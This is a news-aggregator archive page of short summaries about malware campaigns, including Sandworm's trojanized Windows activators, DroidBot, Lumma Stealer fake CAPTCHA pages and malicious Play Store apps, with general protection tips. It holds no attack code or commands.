malware distribution Archives

Winsage

February 12, 2025

Russian military hackers deploy malicious Windows activators in Ukraine

The Sandworm group, a Russian military cyber-espionage entity, has intensified attacks on Windows users in Ukraine by distributing trojanized Microsoft Key Management Service (KMS) activators and counterfeit Windows updates since late 2023. Threat analysts at EclecticIQ have linked these activities to Sandworm through overlapping infrastructure and consistent tactics. The attackers use a BACKORDER loader to deploy DarkCrystal RAT (DcRAT) malware, with evidence of Russian military involvement indicated by debug symbols from a Russian-language build environment. Seven distinct malware distribution campaigns have been cataloged, with the latest incident on January 12, 2025, involving DcRAT during data exfiltration attacks. The counterfeit KMS tool installs a deceptive activation interface while secretly loading malware and disabling Windows Defender. The malware captures sensitive information, including keystrokes and saved credentials, and transmits it to the attackers' servers. Sandworm exploits the prevalence of pirated software in Ukraine, posing a significant threat to national security and critical infrastructure. The group has been active since at least 2009 and operates under Military Unit 74455 of the GRU, focusing on disruptive attacks against Ukraine.

Tech Optimizer

February 11, 2025

Essential tips to protect your computer from malware

Malware includes various types of malicious software such as viruses, worms, Trojans, ransomware, and spyware. Email attachments and links are common methods for malware distribution, with cybercriminals often disguising malicious files as legitimate communications. Regular software updates are essential for protecting against security vulnerabilities. Pirated software frequently contains malware and poses risks to computer security. Installing antivirus and antimalware software is crucial for defense against attacks, with recommendations for programs like Windows Defender and Malwarebytes. Encrypting sensitive data can prevent unauthorized access, and maintaining cloud backups is vital for data recovery in case of ransomware attacks. Using a Virtual Private Network (VPN) is recommended when accessing the internet on public networks to protect personal information. Users should monitor their devices for suspicious activity, such as system slowdowns or unexpected pop-ups, and conduct malware scans if symptoms arise.

AppWizard

December 18, 2024

Google Play Store to remove peer-to-peer ‘app share’ functionality

Version 44.1 of the Google Play Store has removed the "Share apps" feature, which allowed users to share installed applications via Nearby Share. This feature was introduced in early 2021 and enabled app transfers without internet or mobile data usage. The change was noted by 9to5Google in the official changelog, and while Google has not commented on the removal, there are speculations about security concerns related to potential malware distribution. Users can still share apps using Files by Google or third-party file sharing applications.

Winsage

December 9, 2024

The Countdown to Windows 10 End of Life: What IT Teams Need to Know

Microsoft will discontinue support for Windows 10 on October 14, 2025. Extended Security Updates (ESUs) will be available for a maximum of three years at approximately per device. Windows 10 is currently the most targeted among older Windows operating systems, facing high-severity vulnerabilities. Organizations should conduct an asset audit, evaluate ESUs, migrate critical systems to the cloud, and establish a decommission plan for legacy systems. Morphisec offers a lightweight security solution for legacy systems, utilizing Automated Moving Target Defense (AMTD) technology to protect against advanced threats without the need for updates or internet connectivity.

AppWizard

December 6, 2024

New Android Spyware Alert—Delete All These Apps Now

Samsung is tightening security measures against apps from unofficial app stores due to a newly discovered threat from a sophisticated malware called DroidBot. Cleafy, a cybersecurity firm, describes DroidBot as an advanced Android Remote Access Trojan (RAT) that combines traditional hidden VNC and overlay functionalities with spyware capabilities, including keylogging and data exfiltration. The malware has infected 77 applications, including those from banking institutions and cryptocurrency exchanges, and is present in countries such as the UK, Italy, France, Spain, and Portugal, with potential expansion into Latin America and the United States. DroidBot operates as Malware as a Service, available for rent to various threat actors, with 17 identified affiliate groups. It disguises itself as popular applications to entice users into downloading it and exploits permissions to operate covertly, particularly using Accessibility Services. Its functionalities include intercepting SMS messages, keylogging, and creating fake login screens to capture user credentials. Users are advised to avoid installing banking apps from unofficial sources, delete any malicious applications, and ensure their devices are secure by enabling Play Protect and keeping the operating system updated. Key safety measures include using official app stores, verifying app developers, being cautious with permissions, avoiding direct download links, and checking the legitimacy of apps claiming to link to established services.

Tech Optimizer

December 3, 2024

Hackers are now using corrupted files to bypass your antivirus software — how to stay safe

Cybersecurity experts from ANY.RUN have discovered that hackers are using a new method to distribute malware on Windows PCs through phishing emails containing intentionally corrupted Microsoft Office or ZIP files. This tactic is designed to evade detection by users and antivirus software. The corrupted files complicate the identification of malicious content, as security tools fail to extract any files from them, leading to undetected malware. An example of this phishing tactic includes an email impersonating an HR department, which suggests a salary increase while concealing a malicious Word document and a QR code that may lead to a harmful domain. Users are advised to be cautious with emails from unknown senders, verify sender addresses, and ensure robust antivirus software is installed on all devices. It is also recommended to contact senders directly for verification and to avoid downloading attachments from unknown sources.

AppWizard

October 15, 2024

Over 200 malicious apps on Google Play downloaded millions of times

Zscaler's analysis revealed that over 200 malicious applications on Google Play accumulated nearly eight million downloads between June 2023 and April 2024. The identified malware families included Joker (38.2%), Adware (35.9%), Facestealer (14.7%), Coper (3.7%), Loanly Installer (2.3%), Harly (1.4%), and Anatsa (0.9%). In May 2023, Zscaler flagged more than 90 malicious apps on Google Play with 5.5 million downloads. The Necro malware loader was downloaded 11 million times, and Goldoson malware infiltrated 60 legitimate apps with 100 million downloads. Zscaler blocked an average of 1.7 million malware transactions per month, totaling 20 million during the analysis period. Spyware infections surged, particularly from SpyLoan, SpinOK, and SpyNote, with 232,000 blocks recorded. The most targeted countries were India, the United States, Canada, South Africa, and the Netherlands. The education sector saw a 136.8% increase in blocked transactions due to mobile malware. Users are advised to read reviews, verify app publishers, and scrutinize permissions to mitigate malware risks.

Tech Optimizer

October 14, 2024

Windows users are being tricked by sneaky malware scheme – CyberGuy

Hackers are targeting Windows users with a new strain of malware called Lumma Stealer, which spreads through deceptive human verification pages that mimic Google CAPTCHA. These phishing sites, often hosted on various platforms using Content Delivery Networks (CDNs), trick users into clicking a button that copies a PowerShell script to their clipboard. When executed, this script downloads Lumma Stealer from a remote server. The malware is packaged as a file named “dengo.zip,” which must be unzipped and run on the user's machine to become active. Researchers from Cloudsek have identified an increase in malicious sites using this method. To protect against such threats, it is recommended to keep Windows and antivirus software updated, avoid clicking on suspicious links, and refrain from executing unknown commands.

Winsage

October 12, 2024

Microsoft Warns Millions Of Windows Users—Change Your Browser As New Attacks Underway

Microsoft has issued a warning to Windows users about increasing attacks that exploit legitimate file hosting services, using tactics to evade security measures. These attacks involve fraudulent websites designed to harvest user credentials, prompting Microsoft to recommend the use of Microsoft Edge, which integrates with Microsoft Defender SmartScreen to block malicious sites. Microsoft previously advised Chrome users to update or stop using the browser due to a zero-day vulnerability, encouraging a shift to Edge. The attacks leverage trusted file-sharing platforms like Dropbox and OneDrive, deceiving users into opening malicious files. Microsoft emphasizes using Edge with conditional access policies and Microsoft Defender for enhanced security. Additionally, Microsoft is developing a privacy-preserving ads API for Edge, aiming to improve user privacy while addressing the challenges of third-party cookie tracking. This new API is currently in limited preview and requires manual activation in specific regions.

AppWizard

September 26, 2024

Ukraine restricts Telegram use for government, military, critical infrastructure

Ukraine has announced restrictions on the use of the Telegram messaging app among government officials, military personnel, and employees of critical infrastructure sectors due to concerns of potential misuse by Russian intelligence and military forces. Kyrylo Budanov, Ukraine's military intelligence chief, has labeled Telegram as "harmful" and a "threat to our national security," citing evidence that Russian intelligence services can access users' personal correspondence. The Security Service of Ukraine (SBU) and the General Staff of the Ukrainian Armed Forces have confirmed that Telegram is being exploited for cyberattacks, phishing, malware distribution, and geolocating users for missile strikes against Ukrainian targets. Consequently, Ukraine's cybersecurity center has prohibited the use of Telegram on official devices for those in government and military roles, with exceptions for necessary official duties. Telegram's popularity in Ukraine increased after the invasion in 2022, but its anonymous channels have raised concerns about misuse. Additionally, Telegram's CEO, Pavel Durov, has faced legal challenges in France related to the platform.